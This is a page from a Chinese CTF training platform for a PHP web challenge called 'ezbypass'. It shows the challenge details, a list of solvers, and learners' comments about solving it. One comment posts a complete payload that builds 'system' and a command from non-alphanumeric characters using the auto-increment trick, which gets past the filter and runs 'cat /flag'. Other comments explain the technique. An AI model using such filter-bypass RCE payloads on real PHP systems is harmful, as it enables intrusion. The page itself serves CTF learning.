ezbypassWEB 未解决

分数: 25 金币: 4
题目作者: XHH1H
一  血: volcano
一血奖励: 5金币
解  决: 504
提  示:
描  述:
flag{}
评论
鲲中霸王 2天前

code=$_=(_/_._)[_];$__=%2B%2B$_;%2B%2B$_;$__=_.$_.$__;%2B%2B$_;%2B%2B$_;$__.=%2B%2B$_;$__.=%2B%2B$_;$$__[_]($$__[__]);&_= system&__=cat /flag

回复 1

lzhh530393027 19天前

看懂解析了,但是再做一次也不会

回复 0

jiubanyipeng 6月前

脚本参考:https://www.jiubanyipeng.com/1851.html

回复 1

Jiafeng 12月前

我去,属于知道思路,但是不敢实践的题目;(无数子字母RCE)

回复 0

小丁小丁少发神经 1年前

求问为啥设计成system和cat /flag用两个参数传,为什么不可以构造出$_POST[_]然后赋值_=system(cat /flag)呢(验证一下确实不行,但是不懂为啥)

回复 0
shingu 8月前

我也有个疑问。我花了好几个小时去研究,但也是一知半解。目前得到的答案是:`$$_[_]` 等价于 `${$_POST['_']}`,即用 `$_POST['_']` 的值作为变量名。如果使用`_=system(cat /flag)`,PHP会尝试访问名为 `$system('cat /flag')` 的变量,这显然非法,所以行不通。

回复 0

不会写代码的菜鸟 1年前

这道题完全不是我能做的,有答案也看不懂

回复 1

modeng 1年前

以下是我的思路与总结,希望对你有所帮助https://blog.csdn.net/m_de_g/article/details/138110100?spm=1001.2014.3001.5501

回复 5
Jiafeng 12月前

牛逼,可以直接造出N字符,那就好搞了;

回复 0

hutiaan 1年前

难,为了难而难

回复 0

不懂就问 1年前

参考:https://blog.csdn.net/qq_36292543/article/details/136623586

回复 2

不会编程的崽 1年前

自增绕过,最后的payload可以在burp里进行对特殊字符的url编码

回复 0

WriteUp

image
Jesen

2 金币

评分(4)

解题动态

白菜白又白 攻破了该题 1天前
鲲中霸王 攻破了该题 2天前
out不慢 攻破了该题 4天前
igotyou 攻破了该题 6天前
180度以南 攻破了该题 7天前
ixin 攻破了该题 8天前
cccczz 攻破了该题 8天前
爱睡觉的鱼 攻破了该题 10天前
xxaqgcszzh 攻破了该题 12天前
caocao 攻破了该题 14天前
一世温华 攻破了该题 14天前
kkkoooppp 攻破了该题 16天前
对对对对对对对对 攻破了该题 17天前
tytu 攻破了该题 17天前
ysy126 攻破了该题 17天前
wyjzzzz 攻破了该题 22天前
辛笙 攻破了该题 24天前
20207097 攻破了该题 27天前
blueboat 攻破了该题 29天前
suha 攻破了该题 1月前
问题反馈